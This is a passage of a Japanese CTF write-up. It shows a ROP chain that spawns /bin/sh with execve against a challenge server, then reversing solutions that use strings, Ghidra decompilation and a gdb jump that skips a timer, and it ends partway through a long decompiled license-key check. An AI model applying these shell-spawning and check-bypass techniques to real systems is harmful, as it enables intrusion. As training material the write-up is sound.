+--------------------+
| system             |
+--------------------+
> 0
     rop_arena
+--------------------+
| pop rdi; ret       |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| system             |
+--------------------+
ls
chall
flag.txt
redir.sh
cat flag.txt
FLAG{this-is-simple-return-oriented-programming}
FLAG{this-is-simple-return-oriented-programming}

04 rop machine normal (Pwn)

rdiは"/bin/sh"のアドレス、rsi, rdxは0、raxはexecveのsyscall番号を指定して、syscallを実行できればよい。

$ nc rop-normal.pwn.wanictf.org 9004

"/bin/sh" address is 0x404070

[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "pop rsi; ret" addr
4. append "pop rdx; ret" addr
5. append "pop rax; ret" addr
6. append "syscall; ret" addr
8. show menu (this one)
9. show rop_arena
0. execute rop
> 2
"pop rdi; ret" is appended
> 1
hex value?: 0x404070
0x0000000000404070 is appended
> 3
"pop rsi; ret" is appended
> 1
hex value?: 0
0x0000000000000000 is appended
> 4
"pop rdx; ret" is appended
> 1
hex value?: 0
0x0000000000000000 is appended
> 5
"pop rax; ret" is appended
> 1
hex value?: 0x3b
0x000000000000003b is appended
> 6
"syscall; ret" is appended
> 9
     rop_arena
+--------------------+
| pop rdi; ret       |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| pop rsi; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rdx; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rax; ret       |
+--------------------+
| 0x000000000000003b |
+--------------------+
| syscall; ret       |
+--------------------+
> 0
     rop_arena
+--------------------+
| pop rdi; ret       |<- rop start
+--------------------+
| 0x0000000000404070 |
+--------------------+
| pop rsi; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rdx; ret       |
+--------------------+
| 0x0000000000000000 |
+--------------------+
| pop rax; ret       |
+--------------------+
| 0x000000000000003b |
+--------------------+
| syscall; ret       |
+--------------------+
ls
chall
flag.txt
redir.sh
cat flag.txt
FLAG{now-you-can-call-any-system-calls-with-syscall}
FLAG{now-you-can-call-any-system-calls-with-syscall}

secret (Reversing)

secret keyになる文字列が隠されていないか確認してみる。

$ strings secret
        :
        :
Input secret key : 
Incorrect
wani_is_the_coolest_animals_in_the_world!
Correct! Flag is %s
        :
        :

チェックが正しい時のメッセージに近いところにkeyらしきものがある。

$ ./secret

   ▄▀▀▀▀▄  ▄▀▀█▄▄▄▄  ▄▀▄▄▄▄   ▄▀▀▄▀▀▀▄  ▄▀▀█▄▄▄▄  ▄▀▀▀█▀▀▄
  █ █   ▐ ▐  ▄▀   ▐ █ █    ▌ █   █   █ ▐  ▄▀   ▐ █    █  ▐
     ▀▄     █▄▄▄▄▄  ▐ █      ▐  █▀▀█▀    █▄▄▄▄▄  ▐   █
  ▀▄   █    █    ▌    █       ▄▀    █    █    ▌     █
   █▀▀▀    ▄▀▄▄▄▄    ▄▀▄▄▄▄▀ █     █    ▄▀▄▄▄▄    ▄▀
   ▐       █    ▐   █     ▐  ▐     ▐    █    ▐   █
           ▐        ▐                   ▐        ▐

Input secret key : wani_is_the_coolest_animals_in_the_world!
Correct! Flag is FLAG{ana1yze_4nd_strin6s_and_execu7e_6in}
FLAG{ana1yze_4nd_strin6s_and_execu7e_6in}

execute (Reversing)

アセンブリから実行ファイルにする。

$ as main.s -o main

生成した実行ファイルをGhidraでデコンパイルする。

undefined8 main(void)

{
  long in_FS_OFFSET;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined8 local_20;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_38 = 0x6e34637b47414c46;
  local_30 = 0x6578655f7530795f;
  local_28 = 0x3168745f65347563;
  local_20 = 0x7d653169665f73;
  print(&local_38);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}
>>> '6e34637b47414c46'.decode('hex')[::-1]
'FLAG{c4n'
>>> '6578655f7530795f'.decode('hex')[::-1]
'_y0u_exe'
>>> '3168745f65347563'.decode('hex')[::-1]
'cu4e_th1'
>>> '7d653169665f73'.decode('hex')[::-1]
's_fi1e}'
FLAG{c4n_y0u_execu4e_th1s_fi1e}

timer (Reversing)

$ ./timer

  ████████╗██╗███╗   ███╗███████╗██████╗ 
  ╚══██╔══╝██║████╗ ████║██╔════╝██╔══██╗
     ██║   ██║██╔████╔██║█████╗  ██████╔╝
     ██║   ██║██║╚██╔╝██║██╔══╝  ██╔══██╗
     ██║   ██║██║ ╚═╝ ██║███████╗██║  ██║
     ╚═╝   ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝

I'll show the flag when the timer is 0 seconds.

259200 seconds left.
259199 seconds left.
259198 seconds left.
259197 seconds left.
    :

そのまま実行すると、フラグが表示されるまでに時間がかかる。

$ gdb -q ./timer
Reading symbols from ./timer...(no debugging symbols found)...done.
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x0000000000001000  _init
0x0000000000001030  puts@plt
0x0000000000001040  printf@plt
0x0000000000001050  memcpy@plt
0x0000000000001060  sleep@plt
0x0000000000001070  __cxa_finalize@plt
0x0000000000001080  _start
0x00000000000010b0  deregister_tm_clones
0x00000000000010e0  register_tm_clones
0x0000000000001120  __do_global_dtors_aux
0x0000000000001160  frame_dummy
0x0000000000001170  super_complex_flag_print_function
0x000000000000141a  show_description
0x000000000000149d  timer
0x00000000000014ef  main
0x0000000000001510  __libc_csu_init
0x0000000000001580  __libc_csu_fini
0x0000000000001588  _fini
gdb-peda$ b main
Breakpoint 1 at 0x14ef
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/timer 
[----------------------------------registers----------------------------------]
RAX: 0x5555555554ef (<main>:	endbr64)
RBX: 0x0 
RCX: 0x555555555510 (<__libc_csu_init>:	endbr64)
RDX: 0x7fffffffe088 --> 0x7fffffffe3c6 ("CLUTTER_IM_MODU"...)
RSI: 0x7fffffffe078 --> 0x7fffffffe3af ("/mnt/hgfs/Share"...)
RDI: 0x1 
RBP: 0x555555555510 (<__libc_csu_init>:	endbr64)
RSP: 0x7fffffffdf98 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
RIP: 0x5555555554ef (<main>:	endbr64)
R8 : 0x7ffff7dced80 --> 0x0 
R9 : 0x7ffff7dced80 --> 0x0 
R10: 0x0 
R11: 0x0 
R12: 0x555555555080 (<_start>:	endbr64)
R13: 0x7fffffffe070 --> 0x1 
R14: 0x0 
R15: 0x0
[------------------------------------code-------------------------------------]
Display various information of current execution context
Usage:
    context [reg,code,stack,all] [code/stack length]


Breakpoint 1, 0x00005555555554ef in main ()
gdb-peda$ jump *super_complex_flag_print_function
Continuing at 0x555555555170.
The time has come. Flag is "FLAG{S0rry_Hav3_you_b3en_wai7ing_lon6?_No_I_ju5t_g0t_her3}"
[Inferior 1 (process 92114) exited normally]

タイマー実行は飛ばして、super_complex_flag_print_function関数を実行するようにしたら、フラグが表示された。

FLAG{S0rry_Hav3_you_b3en_wai7ing_lon6?_No_I_ju5t_g0t_her3}

licence (Reversing)

Ghidraでデコンパイルする。

undefined8 main(int param_1,long param_2)

{
  int iVar1;
  undefined8 uVar2;
  FILE *__stream;
  char *pcVar3;
  long in_FS_OFFSET;
  char local_98 [32];
  char local_78 [32];
  char local_58 [72];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  if (param_1 == 2) {
    __stream = fopen(*(char **)(param_2 + 8),"r");
    if (__stream == (FILE *)0x0) {
      puts("Failed to open file");
      uVar2 = 1;
    }
    else {
      pcVar3 = fgets(local_78,0x1d,__stream);
      if (pcVar3 == (char *)0x0) {
        puts("Failed to read file");
        uVar2 = 1;
      }
      else {
        iVar1 = strcmp(local_78,"-----BEGIN LICENCE KEY-----\n");
        if (iVar1 == 0) {
          pcVar3 = fgets(local_58,0x41,__stream);
          if (pcVar3 == (char *)0x0) {
            puts("Failed to read file");
            uVar2 = 1;
          }
          else {
            iVar1 = check(local_58);
            if (iVar1 == 0) {
              pcVar3 = fgets(local_98,0x1b,__stream);
              if (pcVar3 == (char *)0x0) {
                puts("Failed to read file");
                uVar2 = 1;
              }
              else {
                iVar1 = strcmp(local_98,"-----END LICENCE KEY-----\n");
                if (iVar1 == 0) {
                  fclose(__stream);
                  puts("Correct! This software is successfully activated!");
                  uVar2 = 0;
                }
                else {
                  puts("Failed to activate.");
                  uVar2 = 1;
                }
              }
            }
            else {
              puts("Failed to activate.");
              uVar2 = 1;
            }
          }
        }
        else {
          puts("Failed to activate.");
          uVar2 = 1;
        }
      }
    }
  }
  else {
    puts("Failed to execute. Usage: ./licence <key file name>");
    uVar2 = 1;
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar2;
}

undefined8 check(byte *param_1)

{
  undefined8 uVar1;
  
  if ((param_1[0xb] ^ *param_1) == 0x7e) {
    uVar1 = 1;
  }
  else {
    if ((int)(char)param_1[0x2d] + (int)(char)*param_1 == 0x80) {
      uVar1 = 1;
    }
    else {
      if ((int)(char)*param_1 - (int)(char)param_1[0x1c] == 0x18) {
        uVar1 = 1;
      }
      else {
        if (*param_1 == 0x46) {
          if ((int)(char)param_1[1] - (int)(char)param_1[0xd] == 0x1a) {
            uVar1 = 1;
          }
          else {
            if ((int)(char)param_1[1] - (int)(char)param_1[0x12] == 0x21) {
              uVar1 = 1;
            }
            else {
              if ((param_1[0x11] ^ param_1[1]) == 0x34) {
                uVar1 = 1;
              }
              else {
                if ((int)(char)param_1[1] - (int)(char)*param_1 == 6) {
                  if ((int)(char)param_1[2] - (int)(char)param_1[9] == -0x1c) {
                    uVar1 = 1;
                  }
                  else {
                    if ((param_1[0x24] ^ param_1[2]) == 0x72) {
                      uVar1 = 1;
                    }
                    else {
                      if ((int)(char)param_1[2] - (int)(char)param_1[0x1c] == 0x11) {
                        uVar1 = 1;
                      }
                      else {
                        if ((param_1[1] ^ param_1[2]) == 0xd) {
                          if ((int)(char)param_1[0x2b] + (int)(char)param_1[3] == 0xc2) {
                            uVar1 = 1;
                          }
                          else {
                            if ((int)(char)param_1[3] - (int)(char)param_1[0x11] == -0x28) {
                              uVar1 = 1;
                            }
                            else {
                              if ((int)(char)param_1[3] - (int)(char)param_1[0x18] == 0x1a) {
                                uVar1 = 1;
                              }
                              else {
                                if ((param_1[2] ^ param_1[3]) == 6) {
                                  if ((int)(char)param_1[4] - (int)(char)param_1[0x2a] == 0x1a) {
                                    uVar1 = 1;
                                  }
                                  else {
                                    if ((param_1[0x16] ^ param_1[4]) == 0x49) {
                                      uVar1 = 1;
                                    }
                                    else {
                                      if ((int)(char)param_1[3] + (int)(char)param_1[4] == 0xc6) {
                                        uVar1 = 1;
                                      }
                                      else {
                                        if ((param_1[3] ^ param_1[4]) == 0x3c) {
                                          if ((int)(char)param_1[7] + (int)(char)param_1[5] == 0x6c)
                                          {
                                            uVar1 = 1;
                                          }
                                          else {
                                            if ((*param_1 ^ param_1[5]) == 0x7a) {
                                              uVar1 = 1;
                                            }
                                            else {
                                              if (param_1[5] == param_1[0x3b]) {
                                                uVar1 = 1;
                                              }
                                              else {
                                                if ((param_1[4] ^ param_1[5]) == 0x4f) {
                                                  if ((param_1[0x1c] ^ param_1[6]) == 0x5c) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[6] -
                                                        (int)(char)param_1[0x1b] == 3) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[5] ^ param_1[6]) == 0x5a) {
                                                        if ((int)(char)param_1[7] -
                                                            (int)(char)param_1[1] == -0x12) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x1f] +
                                                              (int)(char)param_1[7] == 0xb0) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((param_1[0x13] ^ param_1[7]) == 0x41
                                                               ) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[7] -
                                                                  (int)(char)param_1[6] == -0x38) {
                                                                if ((int)(char)param_1[8] -
                                                                    (int)(char)param_1[0x20] == 6) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((param_1[0x32] ^ param_1[8])
                                                                      == 10) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((int)(char)param_1[8] -
                                                                        (int)(char)param_1[10] ==
                                                                        0x4b) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((param_1[7] ^ param_1[8])
                                                                          == 0x44) {
                                                                        if ((param_1[0x24] ^
                                                                            param_1[9]) == 0x67) {
                                                                          uVar1 = 1;
                                                                        }
                                                                        else {
                                                                          if ((int)(char)param_1[
                                                  0x36] + (int)(char)param_1[9] == 0x9b) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((param_1[0xf] ^ param_1[9]) == 0x68) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[9] -
                                                          (int)(char)param_1[8] == -0x13) {
                                                        if ((int)(char)param_1[10] -
                                                            (int)(char)param_1[2] == -7) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x22] +
                                                              (int)(char)param_1[10] == 0x6b) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((param_1[9] ^ param_1[10]) == 0x6e)
                                                            {
                                                              if ((int)(char)*param_1 +
                                                                  (int)(char)param_1[0xb] == 0x7e) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0xb] -
                                                                    (int)(char)param_1[0x32] ==
                                                                    -0x37) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x23] +
                                                                      (int)(char)param_1[0xb] ==
                                                                      0xa2) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((int)(char)param_1[10] +
                                                                        (int)(char)param_1[0xb] ==
                                                                        0x66) {
                                                                      if ((param_1[0x39] ^
                                                                          param_1[0xc]) == 0x3c) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x17]
                                                                            + (int)(char)param_1[0xc
                                                  ] == 0xda) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0xb] +
                                                        (int)(char)param_1[0xc] == 0x94) {
                                                      if ((param_1[0x27] ^ param_1[0xd]) == 2) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x2c] ^ param_1[0xd]) == 0xc) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x3b] +
                                                              (int)(char)param_1[0xd] == 0x6c) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((int)(char)param_1[0xd] -
                                                                (int)(char)param_1[0xc] == -0x2b) {
                                                              if ((int)(char)param_1[0xe] -
                                                                  (int)(char)param_1[0xf] == 0x2f) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0xe] -
                                                                    (int)(char)param_1[0x3b] == 0x33
                                                                   ) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((param_1[0x2d] ^ param_1[0xe])
                                                                      == 100) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((param_1[0xd] ^ param_1[0xe]
                                                                        ) == 0x6b) {
                                                                      if ((param_1[0x31] ^
                                                                          param_1[0xf]) == 2) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((param_1[0x27] ^
                                                                            param_1[0xf]) == 0xd) {
                                                                          uVar1 = 1;
                                                                        }
                                                                        else {
                                                                          if ((param_1[0x2f] ^
                                                                              param_1[0xf]) == 0x41)
                                                                          {
                                                                            uVar1 = 1;
                                                                          }
                                                                          else {
                                                                            if ((param_1[0xe] ^
                                                                                param_1[0xf]) ==
                                                                                0x6a) {
                                                                              if ((int)(char)param_1
                                                  [0x26] + (int)(char)param_1[0x10] == 0xda) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x20] +
                                                        (int)(char)param_1[0x10] == 0xe7) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x3b] +
                                                          (int)(char)param_1[0x10] == 0xa6) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0xf] ^ param_1[0x10]) == 0x40)
                                                        {
                                                          if ((param_1[0xb] ^ param_1[0x11]) == 0x4d
                                                             ) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((int)(char)param_1[0x11] -
                                                                (int)(char)param_1[0x13] == -1) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x3c] +
                                                                  (int)(char)param_1[0x11] == 0xa2)
                                                              {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x10] +
                                                                    (int)(char)param_1[0x11] == 0xe5
                                                                   ) {
                                                                  if ((param_1[0x36] ^ param_1[0x12]
                                                                      ) == 5) {
                                                                    uVar1 = 1;
                                                                  }
                                                                  else {
                                                                    if ((int)(char)param_1[0x12] -
                                                                        (int)(char)param_1[4] ==
                                                                        -0x40) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((param_1[9] ^
                                                                          param_1[0x12]) == 0x57) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x12]
                                                                            - (int)(char)param_1[
                                                  0x11] == -0x3d) {
                                                    if ((int)(char)param_1[0x38] +
                                                        (int)(char)param_1[0x13] == 0xb1) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[6] ^ param_1[0x13]) == 0x1d) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0xb] +
                                                            (int)(char)param_1[0x13] == 0xa8) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((param_1[0x12] ^ param_1[0x13]) ==
                                                              0x41) {
                                                            if ((int)(char)param_1[0x14] -
                                                                (int)(char)param_1[2] == 0x20) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x18] +
                                                                  (int)(char)param_1[0x14] == 0x9b)
                                                              {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((param_1[0x2a] ^ param_1[0x14])
                                                                    == 0x33) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((param_1[0x13] ^ param_1[0x14]
                                                                      ) == 0x2d) {
                                                                    if ((int)(char)param_1[0x15] -
                                                                        (int)(char)param_1[9] ==
                                                                        0x17) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((int)(char)param_1[0x17] +
                                                                          (int)(char)param_1[0x15]
                                                                          == 0xec) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x15]
                                                                            - (int)(char)param_1[
                                                  0x2f] == 8) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((param_1[0x14] ^ param_1[0x15]) == 0x2f) {
                                                      if ((int)(char)param_1[0x33] +
                                                          (int)(char)param_1[0x16] == 0x6c) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[3] +
                                                            (int)(char)param_1[0x16] == 0x79) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((param_1[0x15] ^ param_1[0x16]) ==
                                                              0x40) {
                                                            if ((int)(char)param_1[0x2e] +
                                                                (int)(char)param_1[0x17] == 0xaf) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x2b] +
                                                                  (int)(char)param_1[0x17] == 0xed)
                                                              {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x17] -
                                                                    (int)(char)param_1[0x11] == 0x11
                                                                   ) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x16] +
                                                                      (int)(char)param_1[0x17] ==
                                                                      0xa7) {
                                                                    if ((int)(char)param_1[0x37] +
                                                                        (int)(char)param_1[0x18] ==
                                                                        0x6d) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((param_1[0x3e] ^
                                                                          param_1[0x18]) == 0x4d) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x18]
                                                                            - (int)(char)param_1[
                                                  0x2c] == 1) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((param_1[0x17] ^ param_1[0x18]) == 0x44) {
                                                      if ((int)(char)param_1[0x19] -
                                                          (int)(char)param_1[0x35] == -6) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[5] ^ param_1[0x19]) == 0x4f) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x22] +
                                                              (int)(char)param_1[0x19] == 0xa6) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((int)(char)param_1[0x18] +
                                                                (int)(char)param_1[0x19] == 0xa5) {
                                                              if ((int)(char)param_1[0x1a] -
                                                                  (int)(char)*param_1 == 0x27) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x1a] -
                                                                    (int)(char)param_1[0xe] == 8) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x1a] -
                                                                      (int)(char)param_1[0x19] ==
                                                                      -0xc) {
                                                                    if ((int)(char)param_1[0x33] +
                                                                        (int)(char)param_1[0x1b] ==
                                                                        0xaf) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((int)(char)param_1[0x21] +
                                                                          (int)(char)param_1[0x1b]
                                                                          == 0xe0) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((param_1[0x1d] ^
                                                                            param_1[0x1b]) == 0x15)
                                                                        {
                                                                          uVar1 = 1;
                                                                        }
                                                                        else {
                                                                          if ((int)(char)param_1[
                                                  0x1a] + (int)(char)param_1[0x1b] == 0xdb) {
                                                    if ((int)(char)param_1[0x20] +
                                                        (int)(char)param_1[0x1c] == 0xa1) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x1c] -
                                                          (int)(char)param_1[0x35] == -0x45) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x14] ^ param_1[0x1c]) == 0x55)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x1b] +
                                                              (int)(char)param_1[0x1c] == 0xa6) {
                                                            if ((param_1[0x32] ^ param_1[0x1d]) ==
                                                                0x2f) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x1d] -
                                                                  (int)(char)param_1[0x34] == -4) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((param_1[8] ^ param_1[0x1d]) ==
                                                                    0x25) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x1c] +
                                                                      (int)(char)param_1[0x1d] ==
                                                                      0x90) {
                                                                    if ((param_1[0x27] ^
                                                                        param_1[0x1e]) == 0xf) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((param_1[2] ^
                                                                          param_1[0x1e]) == 0x71) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((param_1[0x23] ^
                                                                            param_1[0x1e]) == 0x58)
                                                                        {
                                                                          uVar1 = 1;
                                                                        }
                                                                        else {
                                                                          if ((int)(char)param_1[
                                                  0x1e] - (int)(char)param_1[0x1d] == -0x2a) {
                                                    if ((param_1[0x14] ^ param_1[0x1f]) == 0x1d) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x37] +
                                                          (int)(char)param_1[0x1f] == 0xac) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x1f] -
                                                            (int)(char)param_1[0x20] == 0x15) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x1f] -
                                                              (int)(char)param_1[0x1e] == 0x44) {
                                                            if ((int)(char)param_1[0x37] +
                                                                (int)(char)param_1[0x20] == 0xa1) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((param_1[0x3a] ^ param_1[0x20]) ==
                                                                  0x55) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[8] +
                                                                    (int)(char)param_1[0x20] == 0xe6
                                                                   ) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x20] -
                                                                      (int)(char)param_1[0x1f] ==
                                                                      -0xc) {
                                                                    if ((int)(char)param_1[0x21] -
                                                                        (int)(char)param_1[0x29] ==
                                                                        0x36) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((int)(char)param_1[0x11] +
                                                                          (int)(char)param_1[0x21]
                                                                          == 0xd9) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x21]
                                                                            - (int)(char)*param_1 ==
                                                                            0x23) {
                                                                          uVar1 = 1;
                                                                        }
                                                                        else {
                                                                          if ((int)(char)param_1[
                                                  0x21] - (int)(char)param_1[0x20] == -0xb) {
                                                    if ((int)(char)param_1[0x22] -
                                                        (int)(char)param_1[0x30] == -0x2a) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x22] -
                                                          (int)(char)param_1[6] == -0x37) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x22] -
                                                            (int)(char)param_1[0x16] == 5) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x21] +
                                                              (int)(char)param_1[0x22] == 0x92) {
                                                            if ((param_1[0x3d] ^ param_1[0x23]) ==
                                                                0x1d) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x19] +
                                                                  (int)(char)param_1[0x23] == 0xe5)
                                                              {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x2b] +
                                                                    (int)(char)param_1[0x23] == 0xea
                                                                   ) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((int)(char)param_1[0x23] -
                                                                      (int)(char)param_1[0x22] ==
                                                                      0x3c) {
                                                                    if ((param_1[0x18] ^
                                                                        param_1[0x24]) == 10) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((int)(char)param_1[0x1a] +
                                                                          (int)(char)param_1[0x24]
                                                                          == 0x9e) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((param_1[0xc] ^
                                                                            param_1[0x24]) == 0x54)
                                                                        {
                                                                          uVar1 = 1;
                                                                        }
                                                                        else {
                                                                          if ((int)(char)param_1[
                                                  0x24] - (int)(char)param_1[0x23] == -0x3b) {
                                                    if ((param_1[0x28] ^ param_1[0x25]) == 0x1f) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x25] -
                                                          (int)(char)param_1[0x23] == -8) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x13] ^ param_1[0x25]) == 0x16)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x25] -
                                                              (int)(char)param_1[0x24] == 0x32) {
                                                            if ((int)(char)param_1[0x18] +
                                                                (int)(char)param_1[0x26] == 0x99) {
                                                              uVar1 = 1;
                                                            }
                                                            else {
                                                              if ((int)(char)param_1[0x12] +
                                                                  (int)(char)param_1[0x26] == 0x93)
                                                              {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x13] +
                                                                    (int)(char)param_1[0x26] == 0xd2
                                                                   ) {
                                                                  uVar1 = 1;
                                                                }
                                                                else {
                                                                  if ((param_1[0x25] ^ param_1[0x26]
                                                                      ) == 0x3c) {
                                                                    if ((param_1[0x21] ^
                                                                        param_1[0x27]) == 0x5a) {
                                                                      uVar1 = 1;
                                                                    }
                                                                    else {
                                                                      if ((param_1[0x3c] ^
                                                                          param_1[0x27]) == 2) {
                                                                        uVar1 = 1;
                                                                      }
                                                                      else {
                                                                        if ((int)(char)param_1[0x27]
                                                                            - (int)(char)param_1[
                                                  0x23] == -0x30) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x26] +
                                                        (int)(char)param_1[0x27] == 0x92) {
                                                      if ((int)(char)param_1[0x3c] +
                                                          (int)(char)param_1[0x28] == 0xaf) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x2f] +
                                                            (int)(char)param_1[0x28] == 0xef) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          if ((int)(char)param_1[0x28] -
                                                              (int)(char)param_1[0x3e] == 2) {
                                                            uVar1 = 1;
                                                          }
                                                          else {
                                                            if ((param_1[0x27] ^ param_1[0x28]) ==
                                                                0x4b) {
                                                              if ((param_1[0x1e] ^ param_1[0x29]) ==
                                                                  0xf) {
                                                                uVar1 = 1;
                                                              }
                                                              else {
                                                                if ((int)(char)param_1[0x3b] +
                                                                    (int)(char)param_1[0x29] == 0x65
